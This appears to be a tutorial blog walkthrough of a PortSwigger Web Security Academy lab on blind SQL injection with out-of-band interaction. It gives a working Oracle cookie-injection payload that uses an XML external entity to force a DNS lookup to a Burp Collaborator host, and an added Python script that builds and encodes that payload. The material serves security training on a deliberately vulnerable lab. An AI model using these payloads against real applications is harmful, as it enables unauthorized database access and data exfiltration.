
Blind SQL injection with out-of-band interaction

Introduction

Hello, friends! How are you all doing? This is our 13th article on SQL injection. In this article, we work through the PortSwigger Web Security Academy lab “Blind SQL injection with out-of-band interaction” and give a step-by-step practical solution.

Lab Description


This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics and performs a SQL query containing the submitted cookie value. The query is executed asynchronously, so it has no effect on the application’s response: there is no error message, no difference in page content and no measurable delay to observe, which rules out the error-based, boolean-based and time-based techniques from the earlier labs. We can still detect the injection by making the database itself interact with an external domain that we control, i.e. an out-of-band interaction.

To solve the lab, we need to make the database perform a DNS lookup to a Burp Collaborator subdomain. The interaction recorded by Collaborator is the only evidence that the injection worked, since the application’s own response never changes.

Lab Solution


First, access the lab.


After accessing the lab, open Burp Suite and enable the proxy. Intercept the request for the lab’s home page in Burp and send it to the Repeater tab, where we will do the rest of the testing.


As you can see, the request carries a cookie named TrackingId, and that cookie value is the injection point we need to exploit.

TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

We will use this payload to exploit the vulnerability. The lab’s database is Oracle (hence xmltype and FROM dual), so the payload closes the original string, appends a UNION SELECT and passes an XML document to EXTRACTVALUE(xmltype(...)). The document’s DTD declares a parameter entity whose SYSTEM identifier points at the Collaborator host; when Oracle’s XML parser resolves %remote; it has to look up that hostname, and that lookup is the DNS interaction we are after. Spaces are encoded as + and the key characters ? = % : ; are URL-encoded so the value survives in the cookie; the quotes, brackets and parentheses are left as they are.


Go to Burp Suite and open the Collaborator tab (the Collaborator client in older versions). Click “Copy to clipboard” to copy your Collaborator payload.

In my case, this is my payload: owoz4gexpzu1mzmo0e6qeb2ft6zwnl.oastify.com

Now, replace BURP-COLLABORATOR-SUBDOMAIN in the payload above with your own Burp Collaborator payload.

Here is the final version of the payload (below):

TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//owoz4gexpzu1mzmo0e6qeb2ft6zwnl.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--

I have inserted the Burp Collaborator payload. Now, in the Repeater tab, replace the value of the TrackingId cookie in the request with this payload.


Before sending the request, it will look similar to this:


Now send the request. Because the query runs asynchronously, the HTTP response looks exactly the same whether or not the injection worked, so do not expect any change there. Instead, go back to the Collaborator tab and click “Poll now”: you will see DNS lookups for your subdomain, which confirm that the out-of-band blind SQL injection works.
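The steps above come down to one thing: getting the URL-encoded payload right with your own Collaborator subdomain in it. The following is an added example, not code from the article or from PortSwigger, that builds the TrackingId value from a readable template instead of hand-editing the encoded string, encodes only the characters the article’s payload encodes, and decodes it back as a sanity check. The subdomain passed in is a constructed placeholder; use the one Burp Collaborator generates for you.

```python
"""Build the Oracle out-of-band SQL injection payload used in this lab.

Added example (not the article's own code).  It reproduces the TrackingId
cookie value from a readable template so the Collaborator subdomain can be
swapped in without breaking the encoding.  Any subdomain used below is a
constructed placeholder.
"""
from urllib.parse import unquote_plus

# Decoded form of the payload.  The DTD declares a parameter entity whose
# SYSTEM identifier points at the Collaborator host; when Oracle's XML
# parser resolves %remote; it must look up that hostname, which is the DNS
# interaction the lab asks for.  EXTRACTVALUE(...) FROM dual just gives the
# UNION a valid SELECT to ride on.
PAYLOAD_TEMPLATE = (
    "x' UNION SELECT EXTRACTVALUE(xmltype('"
    '<?xml version="1.0" encoding="UTF-8"?>'
    "<!DOCTYPE root [ <!ENTITY % remote SYSTEM "
    '"http://{collab}/"> %remote;]>'
    "'),'/l') FROM dual--"
)

# Only the characters that would break the cookie value are encoded, which
# is what Burp's "URL-encode key characters" does; a full quote_plus() would
# also encode the quotes and parentheses and no longer match the article.
# "%" is listed first so the escapes added afterwards are not re-encoded
# (dict order is insertion order on Python 3.7+).
_KEY_CHARS = {
    "%": "%25",
    " ": "+",
    "?": "%3f",
    "=": "%3d",
    ":": "%3a",
    ";": "%3b",
}


def build_payload(collab_subdomain: str) -> str:
    """Return the URL-encoded TrackingId value for the given Collaborator host."""
    encoded = PAYLOAD_TEMPLATE.format(collab=collab_subdomain)
    for raw, esc in _KEY_CHARS.items():
        encoded = encoded.replace(raw, esc)
    return encoded


def cookie_header(collab_subdomain: str) -> str:
    """Return the full Cookie header line to paste into Repeater."""
    return f"Cookie: TrackingId={build_payload(collab_subdomain)}"


def decode_payload(encoded: str) -> str:
    """Reverse the encoding so a pasted payload can be checked by eye."""
    return unquote_plus(encoded)


if __name__ == "__main__":
    # Constructed placeholder; replace with your own Collaborator payload.
    host = "BURP-COLLABORATOR-SUBDOMAIN"
    print(cookie_header(host))
    # Round trip: decoding the encoded value must give the template back.
    assert decode_payload(build_payload(host)) == PAYLOAD_TEMPLATE.format(collab=host)
```

With the placeholder host the function returns exactly the encoded payload shown earlier in the article, and with your own oastify.com subdomain it returns the final payload you paste into Repeater.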

When I refreshed the PortSwigger Web Security lab on “Blind SQL injection with out-of-band interaction,” it was successfully solved.

You can learn everything related to web security on our website. We upload the latest articles on web security topics on a daily basis, so stay with us.

To continue studying, check out the next lab, Blind SQL Injection With Out-Of-Band Data Exfiltration; finish the current lab before moving on to the next one. Good luck!

FAQS

What is web security?

Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.

What is web application security?

Web application security means protecting a website from cyberattacks. These attacks may include vulnerabilities such as SQL injection, XSS, file inclusion, and others.

Which of the following is a good security practice for web browsing?

It is always good practice to use an up-to-date browser and keep your browser plugins up to date, avoid malicious websites and links, enable two-factor authentication wherever it is offered, and be alert to clickjacking.

How to find someone’s social security number on the dark web

Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.
